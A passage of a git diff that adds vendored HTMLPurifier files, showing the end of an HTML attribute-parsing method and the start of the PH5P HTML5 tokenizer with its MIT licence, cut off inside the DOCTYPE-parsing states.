+ if ($oldVersion) { + $haystack = substr($haystack, $offset, $length); + return substr_count($haystack, $needle); + } else { + return substr_count($haystack, $needle, $offset, $length); + } + } + + /** + * Takes the inside of an HTML tag and makes an assoc array of attributes. + * + * @param $string Inside of tag excluding name. + * @returns Assoc array of attributes. + */ + public function parseAttributeString($string, $config, $context) { + $string = (string) $string; // quick typecast + + if ($string == '') return array(); // no attributes + + $e = false; + if ($config->get('Core.CollectErrors')) { + $e =& $context->get('ErrorCollector'); + } + + // let's see if we can abort as quickly as possible + // one equal sign, no spaces => one attribute + $num_equal = substr_count($string, '='); + $has_space = strpos($string, ' '); + if ($num_equal === 0 && !$has_space) { + // bool attribute + return array($string => $string); + } elseif ($num_equal === 1 && !$has_space) { + // only one attribute + list($key, $quoted_value) = explode('=', $string); + $quoted_value = trim($quoted_value); + if (!$key) { + if ($e) $e->send(E_ERROR, 'Lexer: Missing attribute key'); + return array(); + } + if (!$quoted_value) return array($key => ''); + $first_char = @$quoted_value[0]; + $last_char = @$quoted_value[strlen($quoted_value)-1]; + + $same_quote = ($first_char == $last_char); + $open_quote = ($first_char == '"' || $first_char == "'"); + + if ( $same_quote && $open_quote) { + // well behaved + $value = substr($quoted_value, 1, strlen($quoted_value) - 2); + } else { + // not well behaved + if ($open_quote) { + if ($e) $e->send(E_ERROR, 'Lexer: Missing end quote'); + $value = substr($quoted_value, 1); + } else { + $value = $quoted_value; + } + } + if ($value === false) $value = ''; + return array($key => $this->parseData($value)); + } + + // setup loop environment + $array = array(); // return assoc array of attributes + $cursor = 0; // current position in string (moves forward) + $size = strlen($string); // size of the string (stays the same) + + // if we have unquoted attributes, the parser expects a terminating + // space, so let's guarantee that there's always a terminating space. + $string .= ' '; + + while(true) { + + if ($cursor >= $size) { + break; + } + + $cursor += ($value = strspn($string, $this->_whitespace, $cursor)); + // grab the key + + $key_begin = $cursor; //we're currently at the start of the key + + // scroll past all characters that are the key (not whitespace or =) + $cursor += strcspn($string, $this->_whitespace . '=', $cursor); + + $key_end = $cursor; // now at the end of the key + + $key = substr($string, $key_begin, $key_end - $key_begin); + + if (!$key) { + if ($e) $e->send(E_ERROR, 'Lexer: Missing attribute key'); + $cursor += strcspn($string, $this->_whitespace, $cursor + 1); // prevent infinite loop + continue; // empty key + } + + // scroll past all whitespace + $cursor += strspn($string, $this->_whitespace, $cursor); + + if ($cursor >= $size) { + $array[$key] = $key; + break; + } + + // if the next character is an equal sign, we've got a regular + // pair, otherwise, it's a bool attribute + $first_char = @$string[$cursor]; + + if ($first_char == '=') { + // key="value" + + $cursor++; + $cursor += strspn($string, $this->_whitespace, $cursor); + + if ($cursor === false) { + $array[$key] = ''; + break; + } + + // we might be in front of a quote right now + + $char = @$string[$cursor]; + + if ($char == '"' || $char == "'") { + // it's quoted, end bound is $char + $cursor++; + $value_begin = $cursor; + $cursor = strpos($string, $char, $cursor); + $value_end = $cursor; + } else { + // it's not quoted, end bound is whitespace + $value_begin = $cursor; + $cursor += strcspn($string, $this->_whitespace, $cursor); + $value_end = $cursor; + } + + // we reached a premature end + if ($cursor === false) { + $cursor = $size; + $value_end = $cursor; + } + + $value = substr($string, $value_begin, $value_end - $value_begin); + if ($value === false) $value = ''; + $array[$key] = $this->parseData($value); + $cursor++; + + } else { + // boolattr + if ($key !== '') { + $array[$key] = $key; + } else { + // purely theoretical + if ($e) $e->send(E_ERROR, 'Lexer: Missing attribute key'); + } + + } + } + return $array; + } + +} + +// vim: et sw=4 sts=4 diff --git a/lib/htmlpurifier/library/HTMLPurifier/Lexer/PH5P.php b/lib/htmlpurifier/library/HTMLPurifier/Lexer/PH5P.php new file mode 100644 index 000000000..faf00b829 --- /dev/null +++ b/lib/htmlpurifier/library/HTMLPurifier/Lexer/PH5P.php @@ -0,0 +1,3904 @@ +<?php + +/** + * Experimental HTML5-based parser using Jeroen van der Meer's PH5P library. + * Occupies space in the HTML5 pseudo-namespace, which may cause conflicts. + * + * @note + * Recent changes to PHP's DOM extension have resulted in some fatal + * error conditions with the original version of PH5P. Pending changes, + * this lexer will punt to DirectLex if DOM throughs an exception. + */ + +class HTMLPurifier_Lexer_PH5P extends HTMLPurifier_Lexer_DOMLex { + + public function tokenizeHTML($html, $config, $context) { + $new_html = $this->normalize($html, $config, $context); + $new_html = $this->wrapHTML($new_html, $config, $context); + try { + $parser = new HTML5($new_html); + $doc = $parser->save(); + } catch (DOMException $e) { + // Uh oh, it failed. Punt to DirectLex. + $lexer = new HTMLPurifier_Lexer_DirectLex(); + $context->register('PH5PError', $e); // save the error, so we can detect it + return $lexer->tokenizeHTML($html, $config, $context); // use original HTML + } + $tokens = array(); + $this->tokenizeDOM( + $doc->getElementsByTagName('html')->item(0)-> // <html> + getElementsByTagName('body')->item(0)-> // <body> + getElementsByTagName('div')->item(0) // <div> + , $tokens); + return $tokens; + } + +} + +/* + +Copyright 2007 Jeroen van der Meer <http://jero.net/> + +Permission is hereby granted, free of charge, to any person obtaining a +copy of this software and associated documentation files (the +"Software"), to deal in the Software without restriction, including +without limitation the rights to use, copy, modify, merge, publish, +distribute, sublicense, and/or sell copies of the Software, and to +permit persons to whom the Software is furnished to do so, subject to +the following conditions: + +The above copyright notice and this permission notice shall be included +in all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS +OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF +MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. +IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY +CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, +TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE +SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. + +*/ + +class HTML5 { + private $data; + private $char; + private $EOF; + private $state; + private $tree; + private $token; + private $content_model; + private $escape = false; + private $entities = array('AElig;','AElig','AMP;','AMP','Aacute;','Aacute', + 'Acirc;','Acirc','Agrave;','Agrave','Alpha;','Aring;','Aring','Atilde;', + 'Atilde','Auml;','Auml','Beta;','COPY;','COPY','Ccedil;','Ccedil','Chi;', + 'Dagger;','Delta;','ETH;','ETH','Eacute;','Eacute','Ecirc;','Ecirc','Egrave;', + 'Egrave','Epsilon;','Eta;','Euml;','Euml','GT;','GT','Gamma;','Iacute;', + 'Iacute','Icirc;','Icirc','Igrave;','Igrave','Iota;','Iuml;','Iuml','Kappa;', + 'LT;','LT','Lambda;','Mu;','Ntilde;','Ntilde','Nu;','OElig;','Oacute;', + 'Oacute','Ocirc;','Ocirc','Ograve;','Ograve','Omega;','Omicron;','Oslash;', + 'Oslash','Otilde;','Otilde','Ouml;','Ouml','Phi;','Pi;','Prime;','Psi;', + 'QUOT;','QUOT','REG;','REG','Rho;','Scaron;','Sigma;','THORN;','THORN', + 'TRADE;','Tau;','Theta;','Uacute;','Uacute','Ucirc;','Ucirc','Ugrave;', + 'Ugrave','Upsilon;','Uuml;','Uuml','Xi;','Yacute;','Yacute','Yuml;','Zeta;', + 'aacute;','aacute','acirc;','acirc','acute;','acute','aelig;','aelig', + 'agrave;','agrave','alefsym;','alpha;','amp;','amp','and;','ang;','apos;', + 'aring;','aring','asymp;','atilde;','atilde','auml;','auml','bdquo;','beta;', + 'brvbar;','brvbar','bull;','cap;','ccedil;','ccedil','cedil;','cedil', + 'cent;','cent','chi;','circ;','clubs;','cong;','copy;','copy','crarr;', + 'cup;','curren;','curren','dArr;','dagger;','darr;','deg;','deg','delta;', + 'diams;','divide;','divide','eacute;','eacute','ecirc;','ecirc','egrave;', + 'egrave','empty;','emsp;','ensp;','epsilon;','equiv;','eta;','eth;','eth', + 'euml;','euml','euro;','exist;','fnof;','forall;','frac12;','frac12', + 'frac14;','frac14','frac34;','frac34','frasl;','gamma;','ge;','gt;','gt', + 'hArr;','harr;','hearts;','hellip;','iacute;','iacute','icirc;','icirc', + 'iexcl;','iexcl','igrave;','igrave','image;','infin;','int;','iota;', + 'iquest;','iquest','isin;','iuml;','iuml','kappa;','lArr;','lambda;','lang;', + 'laquo;','laquo','larr;','lceil;','ldquo;','le;','lfloor;','lowast;','loz;', + 'lrm;','lsaquo;','lsquo;','lt;','lt','macr;','macr','mdash;','micro;','micro', + 'middot;','middot','minus;','mu;','nabla;','nbsp;','nbsp','ndash;','ne;', + 'ni;','not;','not','notin;','nsub;','ntilde;','ntilde','nu;','oacute;', + 'oacute','ocirc;','ocirc','oelig;','ograve;','ograve','oline;','omega;', + 'omicron;','oplus;','or;','ordf;','ordf','ordm;','ordm','oslash;','oslash', + 'otilde;','otilde','otimes;','ouml;','ouml','para;','para','part;','permil;', + 'perp;','phi;','pi;','piv;','plusmn;','plusmn','pound;','pound','prime;', + 'prod;','prop;','psi;','quot;','quot','rArr;','radic;','rang;','raquo;', + 'raquo','rarr;','rceil;','rdquo;','real;','reg;','reg','rfloor;','rho;', + 'rlm;','rsaquo;','rsquo;','sbquo;','scaron;','sdot;','sect;','sect','shy;', + 'shy','sigma;','sigmaf;','sim;','spades;','sub;','sube;','sum;','sup1;', + 'sup1','sup2;','sup2','sup3;','sup3','sup;','supe;','szlig;','szlig','tau;', + 'there4;','theta;','thetasym;','thinsp;','thorn;','thorn','tilde;','times;', + 'times','trade;','uArr;','uacute;','uacute','uarr;','ucirc;','ucirc', + 'ugrave;','ugrave','uml;','uml','upsih;','upsilon;','uuml;','uuml','weierp;', + 'xi;','yacute;','yacute','yen;','yen','yuml;','yuml','zeta;','zwj;','zwnj;'); + + const PCDATA = 0; + const RCDATA = 1; + const CDATA = 2; + const PLAINTEXT = 3; + + const DOCTYPE = 0; + const STARTTAG = 1; + const ENDTAG = 2; + const COMMENT = 3; + const CHARACTR = 4; + const EOF = 5; + + public function __construct($data) { + + $this->data = $data; + $this->char = -1; + $this->EOF = strlen($data); + $this->tree = new HTML5TreeConstructer; + $this->content_model = self::PCDATA; + + $this->state = 'data'; + + while($this->state !== null) { + $this->{$this->state.'State'}(); + } + } + + public function save() { + return $this->tree->save(); + } + + private function char() { + return ($this->char < $this->EOF) + ? $this->data[$this->char] + : false; + } + + private function character($s, $l = 0) { + if($s + $l < $this->EOF) { + if($l === 0) { + return $this->data[$s]; + } else { + return substr($this->data, $s, $l); + } + } + } + + private function characters($char_class, $start) { + return preg_replace('#^(['.$char_class.']+).*#s', '\\1', substr($this->data, $start)); + } + + private function dataState() { + // Consume the next input character + $this->char++; + $char = $this->char(); + + if($char === '&' && ($this->content_model === self::PCDATA || $this->content_model === self::RCDATA)) { + /* U+0026 AMPERSAND (&) + When the content model flag is set to one of the PCDATA or RCDATA + states: switch to the entity data state. Otherwise: treat it as per + the "anything else" entry below. */ + $this->state = 'entityData'; + + } elseif($char === '-') { + /* If the content model flag is set to either the RCDATA state or + the CDATA state, and the escape flag is false, and there are at + least three characters before this one in the input stream, and the + last four characters in the input stream, including this one, are + U+003C LESS-THAN SIGN, U+0021 EXCLAMATION MARK, U+002D HYPHEN-MINUS, + and U+002D HYPHEN-MINUS ("<!--"), then set the escape flag to true. */ + if(($this->content_model === self::RCDATA || $this->content_model === + self::CDATA) && $this->escape === false && + $this->char >= 3 && $this->character($this->char - 4, 4) === '<!--') { + $this->escape = true; + } + + /* In any case, emit the input character as a character token. Stay + in the data state. */ + $this->emitToken(array( + 'type' => self::CHARACTR, + 'data' => $char + )); + + /* U+003C LESS-THAN SIGN (<) */ + } elseif($char === '<' && ($this->content_model === self::PCDATA || + (($this->content_model === self::RCDATA || + $this->content_model === self::CDATA) && $this->escape === false))) { + /* When the content model flag is set to the PCDATA state: switch + to the tag open state. + + When the content model flag is set to either the RCDATA state or + the CDATA state and the escape flag is false: switch to the tag + open state. + + Otherwise: treat it as per the "anything else" entry below. */ + $this->state = 'tagOpen'; + + /* U+003E GREATER-THAN SIGN (>) */ + } elseif($char === '>') { + /* If the content model flag is set to either the RCDATA state or + the CDATA state, and the escape flag is true, and the last three + characters in the input stream including this one are U+002D + HYPHEN-MINUS, U+002D HYPHEN-MINUS, U+003E GREATER-THAN SIGN ("-->"), + set the escape flag to false. */ + if(($this->content_model === self::RCDATA || + $this->content_model === self::CDATA) && $this->escape === true && + $this->character($this->char, 3) === '-->') { + $this->escape = false; + } + + /* In any case, emit the input character as a character token. + Stay in the data state. */ + $this->emitToken(array( + 'type' => self::CHARACTR, + 'data' => $char + )); + + } elseif($this->char === $this->EOF) { + /* EOF + Emit an end-of-file token. */ + $this->EOF(); + + } elseif($this->content_model === self::PLAINTEXT) { + /* When the content model flag is set to the PLAINTEXT state + THIS DIFFERS GREATLY FROM THE SPEC: Get the remaining characters of + the text and emit it as a character token. */ + $this->emitToken(array( + 'type' => self::CHARACTR, + 'data' => substr($this->data, $this->char) + )); + + $this->EOF(); + + } else { + /* Anything else + THIS DIFFERS GREATLY FROM THE SPEC: Get as many character that + otherwise would also be treated as a character token and emit it + as a single character token. Stay in the data state. */ + $len = strcspn($this->data, '<&', $this->char); + $char = substr($this->data, $this->char, $len); + $this->char += $len - 1; + + $this->emitToken(array( + 'type' => self::CHARACTR, + 'data' => $char + )); + + $this->state = 'data'; + } + } + + private function entityDataState() { + // Attempt to consume an entity. + $entity = $this->entity(); + + // If nothing is returned, emit a U+0026 AMPERSAND character token. + // Otherwise, emit the character token that was returned. + $char = (!$entity) ? '&' : $entity; + $this->emitToken(array( + 'type' => self::CHARACTR, + 'data' => $char + )); + + // Finally, switch to the data state. + $this->state = 'data'; + } + + private function tagOpenState() { + switch($this->content_model) { + case self::RCDATA: + case self::CDATA: + /* If the next input character is a U+002F SOLIDUS (/) character, + consume it and switch to the close tag open state. If the next + input character is not a U+002F SOLIDUS (/) character, emit a + U+003C LESS-THAN SIGN character token and switch to the data + state to process the next input character. */ + if($this->character($this->char + 1) === '/') { + $this->char++; + $this->state = 'closeTagOpen'; + + } else { + $this->emitToken(array( + 'type' => self::CHARACTR, + 'data' => '<' + )); + + $this->state = 'data'; + } + break; + + case self::PCDATA: + // If the content model flag is set to the PCDATA state + // Consume the next input character: + $this->char++; + $char = $this->char(); + + if($char === '!') { + /* U+0021 EXCLAMATION MARK (!) + Switch to the markup declaration open state. */ + $this->state = 'markupDeclarationOpen'; + + } elseif($char === '/') { + /* U+002F SOLIDUS (/) + Switch to the close tag open state. */ + $this->state = 'closeTagOpen'; + + } elseif(preg_match('/^[A-Za-z]$/', $char)) { + /* U+0041 LATIN LETTER A through to U+005A LATIN LETTER Z + Create a new start tag token, set its tag name to the lowercase + version of the input character (add 0x0020 to the character's code + point), then switch to the tag name state. (Don't emit the token + yet; further details will be filled in before it is emitted.) */ + $this->token = array( + 'name' => strtolower($char), + 'type' => self::STARTTAG, + 'attr' => array() + ); + + $this->state = 'tagName'; + + } elseif($char === '>') { + /* U+003E GREATER-THAN SIGN (>) + Parse error. Emit a U+003C LESS-THAN SIGN character token and a + U+003E GREATER-THAN SIGN character token. Switch to the data state. */ + $this->emitToken(array( + 'type' => self::CHARACTR, + 'data' => '<>' + )); + + $this->state = 'data'; + + } elseif($char === '?') { + /* U+003F QUESTION MARK (?) + Parse error. Switch to the bogus comment state. */ + $this->state = 'bogusComment'; + + } else { + /* Anything else + Parse error. Emit a U+003C LESS-THAN SIGN character token and + reconsume the current input character in the data state. */ + $this->emitToken(array( + 'type' => self::CHARACTR, + 'data' => '<' + )); + + $this->char--; + $this->state = 'data'; + } + break; + } + } + + private function closeTagOpenState() { + $next_node = strtolower($this->characters('A-Za-z', $this->char + 1)); + $the_same = count($this->tree->stack) > 0 && $next_node === end($this->tree->stack)->nodeName; + + if(($this->content_model === self::RCDATA || $this->content_model === self::CDATA) && + (!$the_same || ($the_same && (!preg_match('/[\t\n\x0b\x0c >\/]/', + $this->character($this->char + 1 + strlen($next_node))) || $this->EOF === $this->char)))) { + /* If the content model flag is set to the RCDATA or CDATA states then + examine the next few characters. If they do not match the tag name of + the last start tag token emitted (case insensitively), or if they do but + they are not immediately followed by one of the following characters: + * U+0009 CHARACTER TABULATION + * U+000A LINE FEED (LF) + * U+000B LINE TABULATION + * U+000C FORM FEED (FF) + * U+0020 SPACE + * U+003E GREATER-THAN SIGN (>) + * U+002F SOLIDUS (/) + * EOF + ...then there is a parse error. Emit a U+003C LESS-THAN SIGN character + token, a U+002F SOLIDUS character token, and switch to the data state + to process the next input character. */ + $this->emitToken(array( + 'type' => self::CHARACTR, + 'data' => '</' + )); + + $this->state = 'data'; + + } else { + /* Otherwise, if the content model flag is set to the PCDATA state, + or if the next few characters do match that tag name, consume the + next input character: */ + $this->char++; + $char = $this->char(); + + if(preg_match('/^[A-Za-z]$/', $char)) { + /* U+0041 LATIN LETTER A through to U+005A LATIN LETTER Z + Create a new end tag token, set its tag name to the lowercase version + of the input character (add 0x0020 to the character's code point), then + switch to the tag name state. (Don't emit the token yet; further details + will be filled in before it is emitted.) */ + $this->token = array( + 'name' => strtolower($char), + 'type' => self::ENDTAG + ); + + $this->state = 'tagName'; + + } elseif($char === '>') { + /* U+003E GREATER-THAN SIGN (>) + Parse error. Switch to the data state. */ + $this->state = 'data'; + + } elseif($this->char === $this->EOF) { + /* EOF + Parse error. Emit a U+003C LESS-THAN SIGN character token and a U+002F + SOLIDUS character token. Reconsume the EOF character in the data state. */ + $this->emitToken(array( + 'type' => self::CHARACTR, + 'data' => '</' + )); + + $this->char--; + $this->state = 'data'; + + } else { + /* Parse error. Switch to the bogus comment state. */ + $this->state = 'bogusComment'; + } + } + } + + private function tagNameState() { + // Consume the next input character: + $this->char++; + $char = $this->character($this->char); + + if(preg_match('/^[\t\n\x0b\x0c ]$/', $char)) { + /* U+0009 CHARACTER TABULATION + U+000A LINE FEED (LF) + U+000B LINE TABULATION + U+000C FORM FEED (FF) + U+0020 SPACE + Switch to the before attribute name state. */ + $this->state = 'beforeAttributeName'; + + } elseif($char === '>') { + /* U+003E GREATER-THAN SIGN (>) + Emit the current tag token. Switch to the data state. */ + $this->emitToken($this->token); + $this->state = 'data'; + + } elseif($this->char === $this->EOF) { + /* EOF + Parse error. Emit the current tag token. Reconsume the EOF + character in the data state. */ + $this->emitToken($this->token); + + $this->char--; + $this->state = 'data'; + + } elseif($char === '/') { + /* U+002F SOLIDUS (/) + Parse error unless this is a permitted slash. Switch to the before + attribute name state. */ + $this->state = 'beforeAttributeName'; + + } else { + /* Anything else + Append the current input character to the current tag token's tag name. + Stay in the tag name state. */ + $this->token['name'] .= strtolower($char); + $this->state = 'tagName'; + } + } + + private function beforeAttributeNameState() { + // Consume the next input character: + $this->char++; + $char = $this->character($this->char); + + if(preg_match('/^[\t\n\x0b\x0c ]$/', $char)) { + /* U+0009 CHARACTER TABULATION + U+000A LINE FEED (LF) + U+000B LINE TABULATION + U+000C FORM FEED (FF) + U+0020 SPACE + Stay in the before attribute name state. */ + $this->state = 'beforeAttributeName'; + + } elseif($char === '>') { + /* U+003E GREATER-THAN SIGN (>) + Emit the current tag token. Switch to the data state. */ + $this->emitToken($this->token); + $this->state = 'data'; + + } elseif($char === '/') { + /* U+002F SOLIDUS (/) + Parse error unless this is a permitted slash. Stay in the before + attribute name state. */ + $this->state = 'beforeAttributeName'; + + } elseif($this->char === $this->EOF) { + /* EOF + Parse error. Emit the current tag token. Reconsume the EOF + character in the data state. */ + $this->emitToken($this->token); + + $this->char--; + $this->state = 'data'; + + } else { + /* Anything else + Start a new attribute in the current tag token. Set that attribute's + name to the current input character, and its value to the empty string. + Switch to the attribute name state. */ + $this->token['attr'][] = array( + 'name' => strtolower($char), + 'value' => null + ); + + $this->state = 'attributeName'; + } + } + + private function attributeNameState() { + // Consume the next input character: + $this->char++; + $char = $this->character($this->char); + + if(preg_match('/^[\t\n\x0b\x0c ]$/', $char)) { + /* U+0009 CHARACTER TABULATION + U+000A LINE FEED (LF) + U+000B LINE TABULATION + U+000C FORM FEED (FF) + U+0020 SPACE + Stay in the before attribute name state. */ + $this->state = 'afterAttributeName'; + + } elseif($char === '=') { + /* U+003D EQUALS SIGN (=) + Switch to the before attribute value state. */ + $this->state = 'beforeAttributeValue'; + + } elseif($char === '>') { + /* U+003E GREATER-THAN SIGN (>) + Emit the current tag token. Switch to the data state. */ + $this->emitToken($this->token); + $this->state = 'data'; + + } elseif($char === '/' && $this->character($this->char + 1) !== '>') { + /* U+002F SOLIDUS (/) + Parse error unless this is a permitted slash. Switch to the before + attribute name state. */ + $this->state = 'beforeAttributeName'; + + } elseif($this->char === $this->EOF) { + /* EOF + Parse error. Emit the current tag token. Reconsume the EOF + character in the data state. */ + $this->emitToken($this->token); + + $this->char--; + $this->state = 'data'; + + } else { + /* Anything else + Append the current input character to the current attribute's name. + Stay in the attribute name state. */ + $last = count($this->token['attr']) - 1; + $this->token['attr'][$last]['name'] .= strtolower($char); + + $this->state = 'attributeName'; + } + } + + private function afterAttributeNameState() { + // Consume the next input character: + $this->char++; + $char = $this->character($this->char); + + if(preg_match('/^[\t\n\x0b\x0c ]$/', $char)) { + /* U+0009 CHARACTER TABULATION + U+000A LINE FEED (LF) + U+000B LINE TABULATION + U+000C FORM FEED (FF) + U+0020 SPACE + Stay in the after attribute name state. */ + $this->state = 'afterAttributeName'; + + } elseif($char === '=') { + /* U+003D EQUALS SIGN (=) + Switch to the before attribute value state. */ + $this->state = 'beforeAttributeValue'; + + } elseif($char === '>') { + /* U+003E GREATER-THAN SIGN (>) + Emit the current tag token. Switch to the data state. */ + $this->emitToken($this->token); + $this->state = 'data'; + + } elseif($char === '/' && $this->character($this->char + 1) !== '>') { + /* U+002F SOLIDUS (/) + Parse error unless this is a permitted slash. Switch to the + before attribute name state. */ + $this->state = 'beforeAttributeName'; + + } elseif($this->char === $this->EOF) { + /* EOF + Parse error. Emit the current tag token. Reconsume the EOF + character in the data state. */ + $this->emitToken($this->token); + + $this->char--; + $this->state = 'data'; + + } else { + /* Anything else + Start a new attribute in the current tag token. Set that attribute's + name to the current input character, and its value to the empty string. + Switch to the attribute name state. */ + $this->token['attr'][] = array( + 'name' => strtolower($char), + 'value' => null + ); + + $this->state = 'attributeName'; + } + } + + private function beforeAttributeValueState() { + // Consume the next input character: + $this->char++; + $char = $this->character($this->char); + + if(preg_match('/^[\t\n\x0b\x0c ]$/', $char)) { + /* U+0009 CHARACTER TABULATION + U+000A LINE FEED (LF) + U+000B LINE TABULATION + U+000C FORM FEED (FF) + U+0020 SPACE + Stay in the before attribute value state. */ + $this->state = 'beforeAttributeValue'; + + } elseif($char === '"') { + /* U+0022 QUOTATION MARK (") + Switch to the attribute value (double-quoted) state. */ + $this->state = 'attributeValueDoubleQuoted'; + + } elseif($char === '&') { + /* U+0026 AMPERSAND (&) + Switch to the attribute value (unquoted) state and reconsume + this input character. */ + $this->char--; + $this->state = 'attributeValueUnquoted'; + + } elseif($char === '\'') { + /* U+0027 APOSTROPHE (') + Switch to the attribute value (single-quoted) state. */ + $this->state = 'attributeValueSingleQuoted'; + + } elseif($char === '>') { + /* U+003E GREATER-THAN SIGN (>) + Emit the current tag token. Switch to the data state. */ + $this->emitToken($this->token); + $this->state = 'data'; + + } else { + /* Anything else + Append the current input character to the current attribute's value. + Switch to the attribute value (unquoted) state. */ + $last = count($this->token['attr']) - 1; + $this->token['attr'][$last]['value'] .= $char; + + $this->state = 'attributeValueUnquoted'; + } + } + + private function attributeValueDoubleQuotedState() { + // Consume the next input character: + $this->char++; + $char = $this->character($this->char); + + if($char === '"') { + /* U+0022 QUOTATION MARK (") + Switch to the before attribute name state. */ + $this->state = 'beforeAttributeName'; + + } elseif($char === '&') { + /* U+0026 AMPERSAND (&) + Switch to the entity in attribute value state. */ + $this->entityInAttributeValueState('double'); + + } elseif($this->char === $this->EOF) { + /* EOF + Parse error. Emit the current tag token. Reconsume the character + in the data state. */ + $this->emitToken($this->token); + + $this->char--; + $this->state = 'data'; + + } else { + /* Anything else + Append the current input character to the current attribute's value. + Stay in the attribute value (double-quoted) state. */ + $last = count($this->token['attr']) - 1; + $this->token['attr'][$last]['value'] .= $char; + + $this->state = 'attributeValueDoubleQuoted'; + } + } + + private function attributeValueSingleQuotedState() { + // Consume the next input character: + $this->char++; + $char = $this->character($this->char); + + if($char === '\'') { + /* U+0022 QUOTATION MARK (') + Switch to the before attribute name state. */ + $this->state = 'beforeAttributeName'; + + } elseif($char === '&') { + /* U+0026 AMPERSAND (&) + Switch to the entity in attribute value state. */ + $this->entityInAttributeValueState('single'); + + } elseif($this->char === $this->EOF) { + /* EOF + Parse error. Emit the current tag token. Reconsume the character + in the data state. */ + $this->emitToken($this->token); + + $this->char--; + $this->state = 'data'; + + } else { + /* Anything else + Append the current input character to the current attribute's value. + Stay in the attribute value (single-quoted) state. */ + $last = count($this->token['attr']) - 1; + $this->token['attr'][$last]['value'] .= $char; + + $this->state = 'attributeValueSingleQuoted'; + } + } + + private function attributeValueUnquotedState() { + // Consume the next input character: + $this->char++; + $char = $this->character($this->char); + + if(preg_match('/^[\t\n\x0b\x0c ]$/', $char)) { + /* U+0009 CHARACTER TABULATION + U+000A LINE FEED (LF) + U+000B LINE TABULATION + U+000C FORM FEED (FF) + U+0020 SPACE + Switch to the before attribute name state. */ + $this->state = 'beforeAttributeName'; + + } elseif($char === '&') { + /* U+0026 AMPERSAND (&) + Switch to the entity in attribute value state. */ + $this->entityInAttributeValueState(); + + } elseif($char === '>') { + /* U+003E GREATER-THAN SIGN (>) + Emit the current tag token. Switch to the data state. */ + $this->emitToken($this->token); + $this->state = 'data'; + + } else { + /* Anything else + Append the current input character to the current attribute's value. + Stay in the attribute value (unquoted) state. */ + $last = count($this->token['attr']) - 1; + $this->token['attr'][$last]['value'] .= $char; + + $this->state = 'attributeValueUnquoted'; + } + } + + private function entityInAttributeValueState() { + // Attempt to consume an entity. + $entity = $this->entity(); + + // If nothing is returned, append a U+0026 AMPERSAND character to the + // current attribute's value. Otherwise, emit the character token that + // was returned. + $char = (!$entity) + ? '&' + : $entity; + + $last = count($this->token['attr']) - 1; + $this->token['attr'][$last]['value'] .= $char; + } + + private function bogusCommentState() { + /* Consume every character up to the first U+003E GREATER-THAN SIGN + character (>) or the end of the file (EOF), whichever comes first. Emit + a comment token whose data is the concatenation of all the characters + starting from and including the character that caused the state machine + to switch into the bogus comment state, up to and including the last + consumed character before the U+003E character, if any, or up to the + end of the file otherwise. (If the comment was started by the end of + the file (EOF), the token is empty.) */ + $data = $this->characters('^>', $this->char); + $this->emitToken(array( + 'data' => $data, + 'type' => self::COMMENT + )); + + $this->char += strlen($data); + + /* Switch to the data state. */ + $this->state = 'data'; + + /* If the end of the file was reached, reconsume the EOF character. */ + if($this->char === $this->EOF) { + $this->char = $this->EOF - 1; + } + } + + private function markupDeclarationOpenState() { + /* If the next two characters are both U+002D HYPHEN-MINUS (-) + characters, consume those two characters, create a comment token whose + data is the empty string, and switch to the comment state. */ + if($this->character($this->char + 1, 2) === '--') { + $this->char += 2; + $this->state = 'comment'; + $this->token = array( + 'data' => null, + 'type' => self::COMMENT + ); + + /* Otherwise if the next seven chacacters are a case-insensitive match + for the word "DOCTYPE", then consume those characters and switch to the + DOCTYPE state. */ + } elseif(strtolower($this->character($this->char + 1, 7)) === 'doctype') { + $this->char += 7; + $this->state = 'doctype'; + + /* Otherwise, is is a parse error. Switch to the bogus comment state. + The next character that is consumed, if any, is the first character + that will be in the comment. */ + } else { + $this->char++; + $this->state = 'bogusComment'; + } + } + + private function commentState() { + /* Consume the next input character: */ + $this->char++; + $char = $this->char(); + + /* U+002D HYPHEN-MINUS (-) */ + if($char === '-') { + /* Switch to the comment dash state */ + $this->state = 'commentDash'; + + /* EOF */ + } elseif($this->char === $this->EOF) { + /* Parse error. Emit the comment token. Reconsume the EOF character + in the data state. */ + $this->emitToken($this->token); + $this->char--; + $this->state = 'data'; + + /* Anything else */ + } else { + /* Append the input character to the comment token's data. Stay in + the comment state. */ + $this->token['data'] .= $char; + } + } + + private function commentDashState() { + /* Consume the next input character: */ + $this->char++; + $char = $this->char(); + + /* U+002D HYPHEN-MINUS (-) */ + if($char === '-') { + /* Switch to the comment end state */ + $this->state = 'commentEnd'; + + /* EOF */ + } elseif($this->char === $this->EOF) { + /* Parse error. Emit the comment token. Reconsume the EOF character + in the data state. */ + $this->emitToken($this->token); + $this->char--; + $this->state = 'data'; + + /* Anything else */ + } else { + /* Append a U+002D HYPHEN-MINUS (-) character and the input + character to the comment token's data. Switch to the comment state. */ + $this->token['data'] .= '-'.$char; + $this->state = 'comment'; + } + } + + private function commentEndState() { + /* Consume the next input character: */ + $this->char++; + $char = $this->char(); + + if($char === '>') { + $this->emitToken($this->token); + $this->state = 'data'; + + } elseif($char === '-') { + $this->token['data'] .= '-'; + + } elseif($this->char === $this->EOF) { + $this->emitToken($this->token); + $this->char--; + $this->state = 'data'; + + } else { + $this->token['data'] .= '--'.$char; + $this->state = 'comment'; + } + } + + private function doctypeState() { + /* Consume the next input character: */ + $this->char++; + $char = $this->char(); + + if(preg_match('/^[\t\n\x0b\x0c ]$/', $char)) { + $this->state = 'beforeDoctypeName'; + + } else { + $this->char--; + $this->state = 'beforeDoctypeName'; + } + } + + private function beforeDoctypeNameState() { + /* Consume the next input character: */ + $this->char++; + $char = $this->char(); + + if(preg_match('/^[\t\n\x0b\x0c ]$/', $char)) { + // Stay in the before DOCTYPE name state. + + } elseif(preg_match('/^[a-z]$/', $char)) { + $this->token = array( + 'name' => strtoupper($char), + 'type' => self::DOCTYPE, + 'error' => true + ); + + $this->state = 'doctypeName'; + + } elseif($char === '>') { + $this->emitToken(array( + 'name' => null, + 'type' => self::DOCTYPE, + 'error' => true + )); + + $this->state = 'data'; + + } elseif($this->char === 